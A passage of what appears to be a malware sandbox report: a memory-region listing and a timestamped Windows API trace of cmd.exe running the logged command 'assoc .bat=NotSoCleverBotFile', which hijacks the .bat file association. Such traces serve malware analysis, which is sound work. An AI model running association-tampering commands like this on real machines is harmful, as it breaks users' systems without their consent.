0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2020 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2021 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2022 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2023 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2024 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2025 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2026 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 2027 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2028 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2029 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2030 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2031 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 2032 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2033 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 2034 start_va = 0x400000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2035 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2036 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2037 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2038 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2039 start_va = 0x510000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2040 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2041 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2042 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2043 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2044 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2045 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2128 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2129 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2130 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 2131 start_va = 0x7c0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 2132 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2133 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2134 start_va = 0x6ab60000 end_va = 0x6ab67fff monitored = 0 entry_point = 0x6ab61840 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 2135 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2136 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2140 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 2141 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2142 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2143 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2144 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2145 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2146 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2147 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2148 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2149 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2150 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2151 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2152 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2153 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 2154 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2155 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2156 start_va = 0x8b0000 end_va = 0xa37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 2157 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2158 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2159 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2160 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2161 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2162 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2163 start_va = 0xa40000 end_va = 0xbc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 2164 start_va = 0x4d60000 end_va = 0x615ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 2165 start_va = 0x6160000 end_va = 0x655afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006160000" filename = "" Region: id = 2166 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 2167 start_va = 0x71ee0000 end_va = 0x71f54fff monitored = 0 entry_point = 0x71f19a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2168 start_va = 0x520000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2169 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 2170 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2171 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2172 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2173 start_va = 0x7c0000 end_va = 0x850fff monitored = 0 entry_point = 0x7f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2174 start_va = 0x8a0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Thread: id = 159 os_tid = 0xfec [0267.257] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0267.257] __set_app_type (_Type=0x1) [0267.257] __p__fmode () returned 0x74ac4d6c [0267.257] __p__commode () returned 0x74ac5b1c [0267.257] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0267.257] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0267.258] GetCurrentThreadId () returned 0xfec [0267.258] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfec) returned 0x84 [0267.258] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0267.258] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0267.258] SetThreadUILanguage (LangId=0x0) returned 0x409 [0267.271] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0267.271] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0267.272] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0267.272] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0267.272] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0267.272] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0267.272] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0267.272] GetConsoleOutputCP () returned 0x1b5 [0267.283] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0267.283] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0267.283] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.283] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0267.325] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.325] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0267.343] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.343] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0267.381] _get_osfhandle (_FileHandle=0) returned 0x38 [0267.382] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0267.393] _get_osfhandle (_FileHandle=0) returned 0x38 [0267.393] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0267.476] GetEnvironmentStringsW () returned 0x5c7cf8* [0267.476] GetProcessHeap () returned 0x5c0000 [0267.476] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa1a) returned 0x5c8720 [0267.476] FreeEnvironmentStringsA (penv="A") returned 1 [0267.476] GetProcessHeap () returned 0x5c0000 [0267.476] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4) returned 0x5c0550 [0267.476] GetEnvironmentStringsW () returned 0x5c7cf8* [0267.477] GetProcessHeap () returned 0x5c0000 [0267.477] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa1a) returned 0x5c9148 [0267.477] FreeEnvironmentStringsA (penv="A") returned 1 [0267.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0267.477] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0267.477] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0267.477] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0267.477] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0267.478] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0267.478] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0267.478] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0267.478] RegCloseKey (hKey=0x94) returned 0x0 [0267.482] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0267.482] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0267.482] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0267.482] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0267.482] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0267.483] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0267.483] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0267.483] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0267.483] RegCloseKey (hKey=0x94) returned 0x0 [0267.483] time (in: timer=0x0 | out: timer=0x0) returned 0x620b7527 [0267.483] srand (_Seed=0x620b7527) [0267.483] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .bat=NotSoCleverBotFile" [0267.483] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .bat=NotSoCleverBotFile" [0267.483] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0267.483] GetProcessHeap () returned 0x5c0000 [0267.483] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x210) returned 0x5c9b70 [0267.483] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5c9b78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0267.484] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0267.484] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0267.484] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0267.484] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0267.484] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0267.484] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0267.484] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0267.484] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0267.484] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0267.484] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0267.484] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0267.485] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0267.485] GetProcessHeap () returned 0x5c0000 [0267.485] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c8720) returned 1 [0267.485] GetEnvironmentStringsW () returned 0x5c7cf8* [0267.486] GetProcessHeap () returned 0x5c0000 [0267.486] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa32) returned 0x5ca7c8 [0267.486] FreeEnvironmentStringsA (penv="A") returned 1 [0267.486] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0267.486] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0267.486] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0267.486] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0267.486] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0267.486] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0267.486] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0267.486] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0267.486] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0267.486] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0267.486] GetProcessHeap () returned 0x5c0000 [0267.486] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x44) returned 0x5c05c8 [0267.487] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0267.487] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0267.487] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0267.487] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5c0618 [0267.488] FindClose (in: hFindFile=0x5c0618 | out: hFindFile=0x5c0618) returned 1 [0267.488] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5c0618 [0267.488] FindClose (in: hFindFile=0x5c0618 | out: hFindFile=0x5c0618) returned 1 [0267.488] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0267.488] FindFirstFileW (in: 